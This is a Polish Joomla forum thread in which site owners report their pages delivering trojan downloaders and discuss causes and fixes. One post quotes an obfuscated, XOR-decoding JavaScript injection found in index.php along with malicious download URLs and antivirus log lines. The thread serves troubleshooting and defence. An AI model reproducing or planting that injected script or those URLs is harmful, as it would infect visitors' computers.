PDA

Zobacz pełną wersję : wirus połączony z joomla?



joombo
11-10-2006, 21:30
Witam,

po klinięciu na jednym z linków na mojej stronie zaczyna się pobierać wirus
Trojan-Downloader.Win32.Small.bso

Mozna o ni m poczytać tu: http://www.emsisoft.it/it/malware/?Trojan-Downloader.Win32.Small.bso

Wirus uruchamia się po wiejściu na moją stronę. Końcówka adresu:
index.php?option=com_content&task=blogcategory&id=70&Itemid=158

Zapisuje się w katalogu tymczasowym IExplorera (z Firefoksem nie zadziałał). Wykrywa go Avast.


2006-10-11 20:10:10 SYSTEM 1948 Sign of "MS06-001 WMF Exploit" has been found in "C:\Documents and Settings\Marek\Ustawienia lokalne\Temporary Internet Files\Content.IE5\3IKNZXC9\xpladv521[1].wmf" file.
2006-10-11 20:08:58 SYSTEM 1948 Sign of "Win32:Small-BSO [Trj]" has been found in "http://zciusfceqg.biz/dl/loaderadv521_5.exe\[UPX]"

Czy to sprawa serwera czy jakiś włam na stronę? Zetknął się ktoś z tym kiedyś? Prosze o odpowiedź.

Moja instalacja Joomli to najnowsza wersja z tej strony. Register globals (serwerowe) ustawione na ON.

Dylek
11-10-2006, 23:15
Hmm... ciekawe, ale bylo o tym na forum. Pewnie atak nastapil poprzez jakis ze starych, dziurawych komponentow.

joombo
11-10-2006, 23:35
Rzeczywiście, jest. Szyukałem "wirus" a to mozna znaleźć pod "trojan"

link do odpowiedzi
http://forum.joomla.pl/forum/showthread.php?t=3623&page=2&highlight=trojan

Tam tez dodałem swoje rozwiązanie

Amperj
10-05-2007, 12:43
witam
przejrzałem te odpowiedzi i nie mogę znaleść problemu u siebie
czytałem również http://forum.joomla.pl/showthread.php?t=3623&page=2&highlight=trojan a
na mojej stronie www.kawowe.pl (http://www.kawowe.pl) ładuje sie wirusWin32/TrojanDownLoader.Ani.Gen i nie mogę go usunąć
ładuje sie ze strony http:/ /www.givecnt.info/ld/ment/dep.png
- sprawdzilem mod_maimenu i nic
znalazłem coś takiego w index.php :
<script language=\"JavaScript\">e = '0x00' + '54';str1 = \"%EF%B7%BC%A1%CB%A6%A7%AC%BF%B0%E8%F5%A1%BC%A6%BC%B 5%BC%BF%BC%A7%AC%ED%B3%BC%B7%B7%B0%B9%F5%E9%EF%BC% B1%A5%B4%B8%B0%CB%A6%A5%B6%E8%F5%B3%A7%A7%BB%ED%FA %FA%B2%BC%A1%B0%B6%B9%A7%F9%BC%B9%B1%BA%FA%BF%B7%F A%B8%B0%B9%A7%FA%F5%CB%A2%BC%B7%A7%B3%E8%E4%CB%B3% B0%BC%B2%B3%A7%E8%E4%E9%EF%FA%BC%B1%A5%B4%B8%B0%E9 %EF%FA%B7%BC%A1%E9\";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

i to był przyczyna tego ale jak to sie dopisało jak zabezpieczyć sie przed podobnymi atakami
nie mam też com_classfields i nie wiem gdzie on sie podłączył jką drogą

proszę o pomoc
Joomla! [ 1.0.11 Stable ]

nibas
11-05-2007, 12:09
Odinstalowalem niepotrzebne dodatki, wgralem najnowsza joomle, zrobilem update skladnikow... register globals na off i jeszcze kilka innych rzeczy - jak narazie 100% powodzenia - nie widze zadnych trojanow ;)

kkmm1
11-05-2007, 23:30
no to ja pokaze wam inny sposob, ktory bedzie was chronil przed atakami "javascript" a wlasciwie to troszke sami sie wysilcie i przeczytajcie ...........http://support.handsonwebhosting.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=102